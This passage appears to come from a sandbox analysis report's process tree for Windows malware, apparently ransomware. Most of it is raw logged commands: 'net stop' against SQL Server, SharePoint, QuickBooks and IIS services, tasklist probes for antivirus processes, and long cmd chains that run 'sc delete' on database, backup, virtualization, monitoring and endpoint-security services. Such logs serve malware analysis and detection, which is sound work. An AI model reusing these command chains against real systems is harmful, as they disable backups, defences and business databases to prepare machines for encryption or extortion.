      C:\Windows\system32\net1 stop SPTimerV4
      4⤵
      PID:3932
- - C:\Windows\SysWOW64\net.exe
    net stop SPTraceV4
    3⤵
    PID:4544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTraceV4
      4⤵
      PID:5380
- - C:\Windows\SysWOW64\net.exe
    net stop SPUserCodeV4
    3⤵
    PID:7800
- - C:\Windows\SysWOW64\net.exe
    net stop SPWriterV4
    3⤵
    PID:7180
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPWriterV4
      4⤵
      PID:4252
- - C:\Windows\SysWOW64\net.exe
    net stop SPSearch4
    3⤵
    PID:5444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPSearch4
      4⤵
      PID:7256
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:4208
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:7776
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:1560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:5048
- - C:\Windows\SysWOW64\net.exe
    net stop firebirdguardiandefaultinstance
    3⤵
    PID:8004
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
      4⤵
      PID:7336
- - C:\Windows\SysWOW64\net.exe
    net stop ibmiasrw
    3⤵
    PID:3044
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ibmiasrw
      4⤵
      PID:1264
- - C:\Windows\SysWOW64\net.exe
    net stop QBCFMonitorService
    3⤵
    PID:5104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService
      4⤵
      PID:3380
- - C:\Windows\SysWOW64\net.exe
    net stop QBVSS
    3⤵
    PID:1004
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBVSS
      4⤵
      PID:6108
- - C:\Windows\SysWOW64\net.exe
    net stop QBPOSDBServiceV12
    3⤵
    PID:7404
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBPOSDBServiceV12
      4⤵
      PID:7284
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
    3⤵
    PID:7348
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
      4⤵
      PID:7200
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
    3⤵
    PID:7564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
      4⤵
      PID:7812
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:7164
- - C:\Windows\SysWOW64\net.exe
    net stop "Simply Accounting Database Connection Manager"
    3⤵
    PID:7432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
      4⤵
      PID:7588
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB1
    3⤵
    PID:7756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB1
      4⤵
      PID:7608
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB2
    3⤵
    PID:8068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB2
      4⤵
      PID:7364
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB3
    3⤵
    PID:7496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB3
      4⤵
      PID:7524
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB4
    3⤵
    PID:7664
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB4
      4⤵
      PID:8172
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB5
    3⤵
    PID:7652
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB5
      4⤵
      PID:7816
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im UniFi.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3472
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq MsMpEng.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:7028
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq ntrtscan.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:6104
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq avp.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:5536
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:6724
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq WRSA.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:7504
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:7668
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq egui.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4940
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:7728
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq AvastUI.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:4840
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
    3⤵
    PID:1440
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "XT800Service_Personal"
      4⤵
      PID:8128
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLSERVERAGENT
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLWriter
      4⤵
      PID:4672
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLBrowser
      4⤵
      PID:5088
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLFDLauncher
      4⤵
      PID:4232
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLSERVER
      4⤵
      Launches sc.exe
      PID:5920
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QcSoftService
      4⤵
      PID:5608
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLServerOLAPService
      4⤵
      PID:6392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMTools
      4⤵
      PID:392
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VGAuthService
      4⤵
      Launches sc.exe
      PID:3644
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSDTC
      4⤵
      PID:5776
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TeamViewer
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ReportServer
      4⤵
      Launches sc.exe
      PID:1932
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RabbitMQ
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "AHS SERVICE"
      4⤵
      PID:6948
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Sense Shield Service"
      4⤵
      PID:7032
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SSMonitorService
      4⤵
      Launches sc.exe
      PID:6836
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SSSyncService
      4⤵
      PID:7784
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdAppService1300
      4⤵
      PID:2940
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQL$SQL2008
      4⤵
      PID:7488
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLAgent$SQL2008
      4⤵
      PID:5212
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdTaskService1300
      4⤵
      Launches sc.exe
      PID:7536
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdUpgradeService1300
      4⤵
      PID:2960
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VirboxWebServer
      4⤵
      PID:3876
  - - C:\Windows\SysWOW64\sc.exe
      sc delete jhi_service
      4⤵
      PID:6204
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LMS
      4⤵
      PID:2840
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FontCache3.0.0.0"
      4⤵
      PID:6208
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "OSP Service"
      4⤵
      Launches sc.exe
      PID:3848
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
    3⤵
    PID:8064
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "DAService_TCP"
      4⤵
      PID:8120
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "eCard-TTransServer"
      4⤵
      Launches sc.exe
      PID:5004
  - - C:\Windows\SysWOW64\sc.exe
      sc delete eCardMPService
      4⤵
      Launches sc.exe
      PID:6460
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UI0Detect
      4⤵
      PID:6192
  - - C:\Windows\SysWOW64\sc.exe
      sc delete EnergyDataService
      4⤵
      PID:3080
  - - C:\Windows\SysWOW64\sc.exe
      sc delete K3MobileService
      4⤵
      PID:6700
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TCPIDDAService
      4⤵
      PID:6808
  - - C:\Windows\SysWOW64\sc.exe
      sc delete WebAttendServer
      4⤵
      PID:6352
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RapidRecoveryAgent
        5⤵
        
        PID:2028
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UIODetect
      4⤵
      PID:5624
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "wanxiao-monitor"
      4⤵
      Launches sc.exe
      PID:5948
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMAuthdService
      4⤵
      PID:6328
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMUSBArbService
      4⤵
      PID:6028
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMwareHostd
      4⤵
      PID:2236
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "vm-agent"
      4⤵
      Launches sc.exe
      PID:6164
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VmAgentDaemon
      4⤵
      PID:6560
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OpenSSHd
      4⤵
      Launches sc.exe
      PID:4612
  - - C:\Windows\SysWOW64\sc.exe
      sc delete eSightService
      4⤵
      PID:7700
  - - C:\Windows\SysWOW64\sc.exe
      sc delete apachezt
      4⤵
      PID:6896
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Jenkins
      4⤵
      PID:7800
  - - C:\Windows\SysWOW64\sc.exe
      sc delete secbizsrv
      4⤵
      PID:6108
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLTELEMETRY
      4⤵
      PID:7584
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSMQ
      4⤵
      PID:5944
  - - C:\Windows\SysWOW64\sc.exe
      sc delete smtpsvrJT
      4⤵
      PID:1304
  - - C:\Windows\SysWOW64\sc.exe
      sc delete zyb_sync
      4⤵
      PID:6704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntHttpServer
      4⤵
      PID:5160
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntSvc
      4⤵
      PID:5080
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntClientSvc
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\sc.exe
      sc delete NFWebServer
      4⤵
      PID:6644
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wampapache
      4⤵
      PID:3056
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSEARCH
      4⤵
      PID:6396
  - - C:\Windows\SysWOW64\sc.exe
      sc delete msftesql
      4⤵
      Launches sc.exe
      PID:5704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SyncBASE Service"
      4⤵
      PID:5748
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleDBConcoleorcl
      4⤵
      Launches sc.exe
      PID:4928
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      PID:6572
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleMTSRecoveryService
      4⤵
      PID:7320
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
    3⤵
    PID:5164
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleOraDb11g_home1ClrAgent
      4⤵
      PID:840
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleOraDb11g_home1TNSListener
      4⤵
      Launches sc.exe
      PID:5452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:7848
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleServiceORCL
      4⤵
      Launches sc.exe
      PID:7760
  - - C:\Windows\SysWOW64\sc.exe
      sc delete aspnet_state @sc delete Redis
      4⤵
      Launches sc.exe
      PID:6204
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:6208
  - - C:\Windows\SysWOW64\sc.exe
      sc delete JhTask
      4⤵
      PID:5136
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      Launches sc.exe
      PID:6272
  - - C:\Windows\SysWOW64\sc.exe
      sc delete XT800Service_Personal
      4⤵
      PID:3984
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MCService
      4⤵
      PID:544
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      PID:5820
  - - C:\Windows\SysWOW64\sc.exe
      sc delete allpass_redisservice_port21160
      4⤵
      PID:6636
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Kiwi Syslog Server"
      4⤵
      PID:6484
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UWS HiPriv Services"
      4⤵
      Launches sc.exe
      PID:8072
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Flash Helper Service"
      4⤵
      PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
    3⤵
    PID:8056
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UWS LoPriv Services"
      4⤵
      PID:1772
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftnlsv3
      4⤵
      PID:5400
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftnlses3
      4⤵
      PID:5216
  - - C:\Windows\SysWOW64\sc.exe
      sc delete FxService
      4⤵
      PID:2828
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UtilDev Web Server Pro"
      4⤵
      PID:7008
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftusbrdwks
      4⤵
      Launches sc.exe
      PID:6848
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftusbrdsrv
      4⤵
      PID:1852
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE USBIP Client Guard"
      4⤵
      PID:6248
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE USBIP Client"
      4⤵
      PID:6148
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE FileTranS"
      4⤵
      Launches sc.exe
      PID:6360
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wwbizsrv
      4⤵
      PID:4412
  - - C:\Windows\SysWOW64\sc.exe
      sc delete qemu-ga
      4⤵
      PID:6556
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AlibabaProtect
      4⤵
      PID:2900
  - - C:\Windows\SysWOW64\sc.exe
      sc delete kbasesrv
      4⤵
      Launches sc.exe
      PID:1396
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MMRHookService
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      PID:7172
  - - C:\Windows\SysWOW64\sc.exe
      sc delete IpOverUsbSvc
      4⤵
      Launches sc.exe
      PID:7368
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MsDtsServer100
      4⤵
      PID:1100
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KuaiYunTools
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KMSELDI
      4⤵
      PID:2356
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ZTEVdservice
      4⤵
      PID:5440
  - - C:\Windows\SysWOW64\sc.exe
      sc delete btPanel
      4⤵
      Launches sc.exe
      PID:5520
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Protect_2345Explorer
      4⤵
      PID:5196
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 2345PicSvc
      4⤵
      PID:3240
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-agent
      4⤵
      PID:5272
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-server
      4⤵
      Launches sc.exe
      PID:5860
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-worker
      4⤵
      PID:3764
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QQCertificateService
      4⤵
      PID:4296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleRemExecService
      4⤵
      PID:6072
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDaemon
      4⤵
      PID:6888
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSUserSvr
      4⤵
      PID:6624
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDownSvr
      4⤵
      PID:4348
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSStorageSvr
      4⤵
      PID:6956
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDataProcSvr
      4⤵
      PID:3276
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSGatewaySvr
      4⤵
      Launches sc.exe
      PID:6632
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMediaSvr
      4⤵
      Launches sc.exe
      PID:6852
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSLoginSvr
      4⤵
      PID:7704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSTomcat6
      4⤵
      PID:7996
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMysqld
      4⤵
      Launches sc.exe
      PID:8028
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSFtpd
      4⤵
      PID:5384
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Zabbix Agent"
      4⤵
      PID:6896
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecAgentAccelerator
      4⤵
      PID:6936
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bedbg
      4⤵
      PID:3140
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecDeviceMediaService
      4⤵
      PID:7336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecRPCService
      4⤵
      PID:4132
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecAgentBrowser
      4⤵
      PID:4932
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecJobEngine
      4⤵
      PID:7752
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecManagementService
      4⤵
      PID:4840
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MDM
      4⤵
      PID:1348
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TxQBService
      4⤵
      PID:4856
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Gailun_Downloader
      4⤵
      PID:5088
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
    3⤵
    PID:3216
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSCRMAsyncService
      4⤵
      PID:4988
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RapService
        5⤵
        
        PID:4924
  - - C:\Windows\SysWOW64\sc.exe
      sc delete REPLICA
      4⤵
      PID:6184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCAVMCU
      4⤵
      PID:5924
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCATS
      4⤵
      Launches sc.exe
      PID:4220
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RtcQms
      4⤵
      PID:6492
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCMEETINGMCU
      4⤵
      PID:5984
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCIMMCU
      4⤵
      PID:3252
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCDATAMCU
      4⤵
      PID:1468
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCCDR
      4⤵
      Launches sc.exe
      PID:6340
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectEventService16
      4⤵
      PID:2396
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectQueueService16
      4⤵
      PID:7952
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPAdminV4
      4⤵
      PID:7624
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPSearchHostController
      4⤵
      Launches sc.exe
      PID:6344
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPTimerV4
      4⤵
      PID:7544
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPTraceV4
      4⤵
      PID:4332
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectCalcService16
      4⤵
      Launches sc.exe
      PID:7180
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OSearch16
      4⤵
      PID:8084
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AppFabricCachingService
      4⤵
      PID:7620
  - - C:\Windows\SysWOW64\sc.exe
      sc delete c2wts
      4⤵
      PID:7600
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ADWS
      4⤵
      PID:5488
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MotionBoard57
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7504
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MotionBoardRCService57
      4⤵
      PID:840
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vsvnjobsvc
      4⤵
      Launches sc.exe
      PID:3620
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VisualSVNServer
      4⤵
      PID:6184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FlexNet Licensing Service 64"
      4⤵
      PID:5696
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BestSyncSvc
      4⤵
      PID:4548
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LPManager
      4⤵
      PID:4876
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MediatekRegistryWriter
      4⤵
      PID:296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RaAutoInstSrv_RT2870
      4⤵
      PID:5276
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup10
      4⤵
      PID:5592
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLANYs_sem5
      4⤵
      PID:3112
  - - C:\Windows\SysWOW64\sc.exe
